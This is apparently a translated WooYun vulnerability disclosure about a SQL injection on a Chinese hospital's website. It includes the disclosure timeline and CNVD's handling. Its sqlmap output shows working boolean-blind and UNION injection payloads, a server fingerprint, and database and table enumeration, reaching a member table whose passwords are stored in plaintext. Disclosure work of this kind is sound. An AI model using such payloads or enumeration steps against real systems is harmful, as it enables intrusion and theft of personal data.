Vulnerability Summary

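Bug ID: wooyun-2015-0154662

Title: SQL injection vulnerability on the home page of the Second Affiliated Hospital of Anhui University of Chinese Medicine

Vendor: The Second Affiliated Hospital of Anhui University of Chinese Medicine

Author: 路人甲

Submitted: 2015-11-23 22:16

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]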

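Vulnerability Details

Disclosure status:

2015-11-23: Details reported to the vendor; awaiting vendor handling
2015-11-27: Vendor has confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public

Brief description:

The official website of the Second Affiliated Hospital of Anhui University of Chinese Medicine has a SQL injection vulnerability.

Detailed description:

Injection point: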
http://**.**.**.**/include/web_content.php?id=727

sqlmap identified the following injection point(s) with a total of 148 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=727 AND 4209=4209
Type: UNION query
Title: MySQL UNION query (41) - 21 columns
Payload: id=-8924 UNION ALL SELECT 41,41,41,41,41,CONCAT(0x71626a7071,0x646b5a53784166556376,0x71706a7171),41,41,41,41,41,41,41,41,41,41,41,41,41,41,41#
---
web server operating system: Linux CentOS
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=727 AND 4209=4209
Type: UNION query
Title: MySQL UNION query (41) - 21 columns
Payload: id=-8924 UNION ALL SELECT 41,41,41,41,41,CONCAT(0x71626a7071,0x646b5a53784166556376,0x71706a7171),41,41,41,41,41,41,41,41,41,41,41,41,41,41,41#
---
web server operating system: Linux CentOS
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5
available databases [3]:
[*] information_schema
[*] test
[*] user_ahz_ahzjyy
Database: user_ahz_ahzjyy
[58 tables]


Member table

Database: user_ahz_ahzjyy
+----------+---------+
| Table | Entries |
+----------+---------+
| web_zchy | 533 |
+----------+---------+
Table: web_zchy
[11 columns]
+------------+------------------+
| Column | Type |
+------------+------------------+
| id | int(10) unsigned |
| isshow | char(1) |
| sendbranch | int(11) |
| user_dw | varchar(100) |
| user_email | varchar(100) |
| user_name | varchar(20) |
| user_pwd | varchar(100) |
| user_qq | int(20) |
| user_sf | varchar(100) |
| user_zwjs | text |
| zs_name | varchar(20) |
+------------+------------------+


Passwords are stored in plaintext.

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


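Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-27 15:07

Vendor reply:

CNVD has confirmed and reproduced the reported vulnerability and has passed it to CNCERT for dispatch to the Anhui branch center, which will follow up by coordinating with the organization that manages the website to handle it.

Latest status:

None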